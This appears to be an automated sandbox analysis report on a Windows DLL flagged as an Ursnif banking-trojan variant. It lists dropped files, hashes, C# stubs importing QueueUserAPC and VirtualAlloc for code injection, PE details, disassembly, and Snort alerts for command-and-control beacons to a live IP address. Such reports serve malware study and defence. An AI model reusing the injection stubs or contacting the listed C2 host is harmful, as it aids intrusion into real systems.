                      SHA-512:5443B147919DCB4D57A4A5C9D1857C5077A1278523DDECC1163515B7B34D7187B1C9BACD94A88BEA8DBFD90AD2A78FB4706EC3A7196939FD598A168AAA5BCA4D
                      Malicious:false
                      Preview:L...R.rb.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSC41D8DEC26D8340F3B72514D252AF5890.TMP................W.<.:...b...'O5!..........4.......C:\Users\user\AppData\Local\Temp\RES4508.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.n.1.3.3.k.5.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ae2dmfll.luf.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r45uapby.kca.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1

                      C:\Users\user\AppData\Local\Temp\nthaltvx.0.cs

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text
                      Category:dropped
                      Size (bytes):403
                      Entropy (8bit):5.058106976759534
                      Encrypted:false
                      SSDEEP:6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y
                      MD5:99BD08BC1F0AEA085539BBC7D61FA79D
                      SHA1:F2CA39B111C367D147609FCD6C811837BE2CE9F3
                      SHA-256:8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9
                      SHA-512:E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396
                      Malicious:false
                      Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class bju. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr wqyemwbu,IntPtr vlbfvx,IntPtr hokikv);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uqvnjbf,uint pmyb,IntPtr rheqdsvorya);.. }..}.

                      C:\Users\user\AppData\Local\Temp\nthaltvx.cmdline

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):351
                      Entropy (8bit):5.241360600918718
                      Encrypted:false
                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23ffzxs7+AEszIWXp+N23fa:p37Lvkmb6KH3WZE8y
                      MD5:690F4C449EF12B6B61A60DF8A9E5B710
                      SHA1:4FC81A633BB70A3E65A1891E3E343C0127F52296
                      SHA-256:2D03F9F60B3CBDB6D821443A41D0EA831CE305D0CE301B1F7A335235C89955EA
                      SHA-512:B5235920836D35661622E2764BE0FC3B46CC01DEB3BB2CB766643887DB43E37A155CA20E0D4496896F328D0AFBAA5CA5C7FE3494B27CE4E4435106721B2FA039
                      Malicious:false
                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nthaltvx.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nthaltvx.0.cs"

                      C:\Users\user\AppData\Local\Temp\nthaltvx.dll

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):3584
                      Entropy (8bit):2.6066887621099695
                      Encrypted:false
                      SSDEEP:24:etGSd8OmU0t3lm85xWAseO4zVWQ64pfUPtkZf9GwVUWI+ycuZhN/akSBPNnq:6DXQ3r5xNOvQfUuJ9P31ul/a3zq
                      MD5:58B1418820FA96CF68C24D094FC6ADAF
                      SHA1:2B17556E62E5F0E6DB05525694B7E24A71396BCE
                      SHA-256:8EA1346CC7438005ECE13A2CEA06992D029764CC12D73545A7BB708210BB80A5
                      SHA-512:30435A178069A2E6C34752E055C6321D321370215B13ABC305682227486FDC69370EF0A8DB0FFD461F08ACDD331AA9DADA641C2893296D8CC81664F89F0542C1
                      Malicious:false
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L.rb...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....p.....w.....~...............a. ...a...!.a.%...a.......*.....3.0.....6.......C.......V...........

                      C:\Users\user\AppData\Local\Temp\nthaltvx.out

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                      Category:modified
                      Size (bytes):848
                      Entropy (8bit):5.316714828382624
                      Encrypted:false
                      SSDEEP:12:xKIR37Lvkmb6KH3WZE8rKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KHkE8rKaM5DqBVKVrdFAMBJTH
                      MD5:BC11DBA7DC38B1D6A0D93EA764F9B617
                      SHA1:08D99E734D46178C394E555EE9AD7F18848BB855
                      SHA-256:4A56BDE13C5C950901BF0781BAABEC10AE01AEC639CCDB3F6ADBDC6D94F958FC
                      SHA-512:D8587E8DFD418B11F8E53CD33FF14C226E29F02E4D410335E0AF717B3631A9071DF48F7998C59CD3D99AE1FC835DA5B413CFDFF37C5FD0BA9F18171997007654
                      Malicious:false
                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nthaltvx.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nthaltvx.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                      C:\Users\user\AppData\Local\Temp\zn133k50.0.cs

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text
                      Category:dropped
                      Size (bytes):392
                      Entropy (8bit):4.988829579018284
                      Encrypted:false
                      SSDEEP:6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy
                      MD5:80545CB568082AB66554E902D9291782
                      SHA1:D013E59DC494D017F0E790D63CEB397583DCB36B
                      SHA-256:E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C
                      SHA-512:C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D
                      Malicious:false
                      Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class buvbcy. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint jujqjjcr,uint fvu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr fnpqam,uint ecktq,uint arixnpjcmw,uint mbhifa);.. }..}.

                      C:\Users\user\AppData\Local\Temp\zn133k50.cmdline

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):351
                      Entropy (8bit):5.278961448116027
                      Encrypted:false
                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fhmJUzxs7+AEszIWXp+N23fh8:p37Lvkmb6KHQJUWZE8q
                      MD5:BBFF8ACF9BC4E9151FAC72A25DB4AF65
                      SHA1:28E85B73B747567810B8AC20E17AFC9FDEEB9E84
                      SHA-256:64398A6210E6B4286F665B7241E912A8B52A069282290C01BD38D81A9E0A78F9
                      SHA-512:F99941DA18AD6C6EF836767AA9212C05D540CE7F6B5AE6796CAC8269612CD08E95E33B42E0FECDA5FB6E1C2C930DCA623358103DDC4A6E51FC09F8BB7621425D
                      Malicious:false
                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\zn133k50.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\zn133k50.0.cs"

                      C:\Users\user\AppData\Local\Temp\zn133k50.dll

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):3584
                      Entropy (8bit):2.6018525555800074
                      Encrypted:false
                      SSDEEP:24:etGSO/u2Bg85z7xlfwZD6QagdWqtkZf9yWI+ycuZhNACakSbDPNnq:6bYb5hFCD6eWdJ9x1ulZa3Vq
                      MD5:257B979BFCA7FC27E6D4D61332E3CB81
                      SHA1:F9DA7F5A4654015EB64351E4F7C9240120242B8E
                      SHA-256:0AF117A0EEA259F2662E5F3F7FD5AAF38C894B7291EBA0B44CCE19B6957CA0A1
                      SHA-512:980305AB481A307E8F7BF1B0BC02805AD177E77DD6CA973CDC9BF30A5014469B9C4857A48C8735E0A395AEBA2CAB225F68CEB43A873685300CD8877F88C40E87
                      Malicious:false
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q.rb...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..T.............................................................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......`.........f.....o.....s.....z...............`. ...`...!.`.%...`.......*.....3.+.....9.......K.......S...........

                      C:\Users\user\AppData\Local\Temp\zn133k50.out

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                      Category:modified
                      Size (bytes):848
                      Entropy (8bit):5.337242198936176
                      Encrypted:false
                      SSDEEP:24:AId3ka6KHQ/E8jKaM5DqBVKVrdFAMBJTH:Akka6AsE8jKxDcVKdBJj
                      MD5:6934C0F5A74CF275FB8E42ED7A182BDA
                      SHA1:60BE0CD7541947626619FB6B9F412A41BB412597
                      SHA-256:AAAEA2133DE4806579F16BD80CDDAF898C879A7EA27C37DEC8A047C89FD7B9C4
                      SHA-512:2B85C364ABD535666247B5E0F3F38AB22114BDE385276AADF46C2A191F593A5C4B33CD168CD33285FCAE59DFEB8485EFA664CC45A377781204D9FBA2039393F6
                      Malicious:false
                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\zn133k50.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\zn133k50.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                      Static File Info

                      General

                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.238617145221457
                      TrID:
                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                      • Generic Win/DOS Executable (2004/3) 0.20%
                      • DOS Executable Generic (2002/1) 0.20%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:rXN8OIpbzz.dll
                      File size:442368
                      MD5:6e21e2268df053e95557a2157ff33103
                      SHA1:efeefb5833b881475bd421da29719d578babb90c
                      SHA256:22a462b2da9c893b5f37dbbc19697d6aeaa28758c2338fca3a806e8d9d3ac483
                      SHA512:06c082964ae3fea79ec03a76be8bca6e9a15da51949edde2a3eda43120a4f209dd490e8bb3dabde28fcc6e2d60e437e0e0632032a457501934034c0172ba3124
                      SSDEEP:6144:rtpWD9yexlJJtyhOhevp/D23qAGzjLg8O9YTEqT2uGRp1WgHyo3NldzlQgOsnGWU:rtpOFlJqYhiVDwGU8OqaX1WW3zNg7
                      TLSH:4D94F14977A11DBBEC0807760CF8C51B9B66BE2CA23A71DEA6683CFF7E175511048706
                      File Content Preview:MZ......................@.......................................<dR.x.<.x.<.x.<.c.....<.uW....<.x.=...<..|....<.{}....<..X?...<.....-.<.{}.._.<..\<...<.Richx.<.PE..L......A...........!.........P......0.............@.................................5......

                      File Icon

                      Icon Hash:9068eccc64f6e2ad

                      Static PE Info

                      General

                      Entrypoint:0x401430
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      DLL Characteristics:TERMINAL_SERVER_AWARE
                      Time Stamp:0x411096D1 [Wed Aug 4 07:57:05 2004 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:0
                      File Version Major:5
                      File Version Minor:0
                      Subsystem Version Major:5
                      Subsystem Version Minor:0
                      Import Hash:0bedc9af0ed7cf2ba33cf662a24d448e

                      Entrypoint Preview

                      Instruction
                      push ebp
                      mov ebp, esp
                      add ecx, FFFFFFFFh
                      call 00007F5980986A6Ch
                      pop eax
                      pop eax
                      mov dword ptr [00414544h], eax
                      mov edx, dword ptr [00414660h]
                      sub edx, 00005289h
                      call edx
                      ret
                      int3
                      push esi
                      mov eax, ebx
                      mov dword ptr [00414540h], eax
                      pop dword ptr [00414538h]
                      mov dword ptr [00414548h], ebp
                      mov dword ptr [0041453Ch], edi
                      sub dword ptr [00414548h], FFFFFFFCh
                      loop 00007F5980986A15h
                      mov dword ptr [ebp+00h], eax
                      nop
                      leave
                      push eax
                      cli
                      test byte ptr [edx+esi*4], bh
                      push edx
                      push FFFFFFBAh
                      lea edi, edx
                      xchg eax, esp
                      jbe 00007F59809869FFh
                      cmp al, B4h
                      pop es

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0xdc180x8c.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000x9f28.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x6c0000xf0c.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0xd0b00x38.rdata
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0xd0000xb0.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x10000x1.text
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000xb7100xc000False0.0735473632812data1.02109217973IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      .rdata0xd0000x10730x2000False0.1806640625data3.72008028236IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0xf0000x79d00x6000False0.373819986979data6.02544165768IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      .crt0x170000x1dc8e0x1e000False0.988427734375data7.9815287954IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      .erloc0x350000x2ca4f0x2d000False0.988259548611data7.98122243943IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      .rsrc0x620000x9f280xa000False0.602783203125data6.51663069246IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x6c0000x132e0x2000False0.219360351562data3.73577949218IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountry
                      RT_BITMAP0x623600x666dataEnglishUnited States
                      RT_ICON0x629c80x485dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                      RT_ICON0x672280x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544EnglishUnited States
                      RT_ICON0x697d00xea8dataEnglishUnited States
                      RT_ICON0x6a6780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                      RT_ICON0x6af200x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                      RT_DIALOG0x6b4880xb4dataEnglishUnited States
                      RT_DIALOG0x6b5400x120dataEnglishUnited States
                      RT_DIALOG0x6b6600x158dataEnglishUnited States
                      RT_DIALOG0x6b7b80x202dataEnglishUnited States
                      RT_DIALOG0x6b9c00xf8dataEnglishUnited States
                      RT_DIALOG0x6bab80xa0dataEnglishUnited States
                      RT_DIALOG0x6bb580xeedataEnglishUnited States
                      RT_GROUP_ICON0x6bc480x4cdataEnglishUnited States
                      RT_VERSION0x6bc980x290MS Windows COFF PA-RISC object fileEnglishUnited States

                      Imports

                      DLLImport
                      KERNEL32.dllEraseTape, GetDiskFreeSpaceExA, lstrlenA, LocalHandle, GetModuleFileNameA, GetBinaryTypeA, GetThreadLocale, GetFileTime, GlobalFlags, GetStringTypeA, EnumResourceTypesA, GetConsoleCP, GetCommTimeouts, WriteProcessMemory, GlobalMemoryStatus, DebugBreak
                      OLEAUT32.dllGetRecordInfoFromTypeInfo, LoadTypeLibEx
                      USER32.dllDefMDIChildProcW, GetMenuItemRect, MessageBoxIndirectW, DeleteMenu, GetClassNameA, GetMessagePos, GetUpdateRgn, GetClientRect, GetScrollBarInfo
                      GDI32.dllExtSelectClipRgn, GetBkColor, GetCharWidthFloatA, GetTextMetricsW, GdiComment
                      ADVAPI32.dllEnumServicesStatusExW, InitiateSystemShutdownExW, RegGetValueA
                      msvcrt.dllstrcoll, fgetwc, srand

                      Version Infos

                      DescriptionData
                      LegalCopyright A Company. All rights reserved.
                      InternalName
                      FileVersion1.0.0.0
                      CompanyNameA Company
                      ProductName
                      ProductVersion1.0.0.0
                      FileDescription
                      OriginalFilenamemyfile.exe
                      Translation0x0409 0x04b0

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States

                      Network Behavior

                      Snort IDS Alerts

                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      05/04/22-12:42:53.250349 05/04/22-12:42:53.250349TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4982080192.168.2.3185.189.151.28
                      05/04/22-12:42:52.800201 05/04/22-12:42:52.800201TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4982080192.168.2.3185.189.151.28
                      05/04/22-12:42:53.707282 05/04/22-12:42:53.707282TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4982080192.168.2.3185.189.151.28
                      05/04/22-12:42:32.722808 05/04/22-12:42:32.722808TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4977080192.168.2.313.107.43.16

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      May 4, 2022 12:42:52.778404951 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:52.795990944 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:52.796118021 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:52.800200939 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:52.817224026 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.086601019 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.086652040 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.086745024 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.086765051 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.086776018 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.086808920 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.086848021 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.086884975 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.086894035 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.086903095 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.086955070 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.087028980 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.087039948 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.087073088 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.087110996 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.087122917 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.087166071 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.087187052 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.087202072 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.087233067 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.087249994 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.087282896 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.087312937 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.087349892 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.104511023 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.104574919 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.104604959 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.104640961 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.104671955 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.104679108 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.104737043 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.104746103 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.104783058 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.104793072 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.104854107 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.104896069 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.104912043 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.104923010 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.104960918 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.104964972 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.104999065 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.105021954 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.105026960 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.105056047 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.105179071 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.105247021 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.105259895 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.105287075 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.105329990 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.105350018 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.105407953 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.105428934 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.105443001 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.105484962 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.105678082 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.105736017 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.105742931 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.105763912 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.105798006 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.105834961 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.105854034 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.105881929 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.105894089 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.105912924 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.106039047 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.106086016 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.106101036 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.106125116 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.106144905 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.106185913 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.106228113 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.106247902 CEST4982080192.168.2.3185.189.151.28
                      May 4, 2022 12:42:53.106254101 CEST8049820185.189.151.28192.168.2.3
                      May 4, 2022 12:42:53.106285095 CEST4982080192.168.2.3185.189.151.28
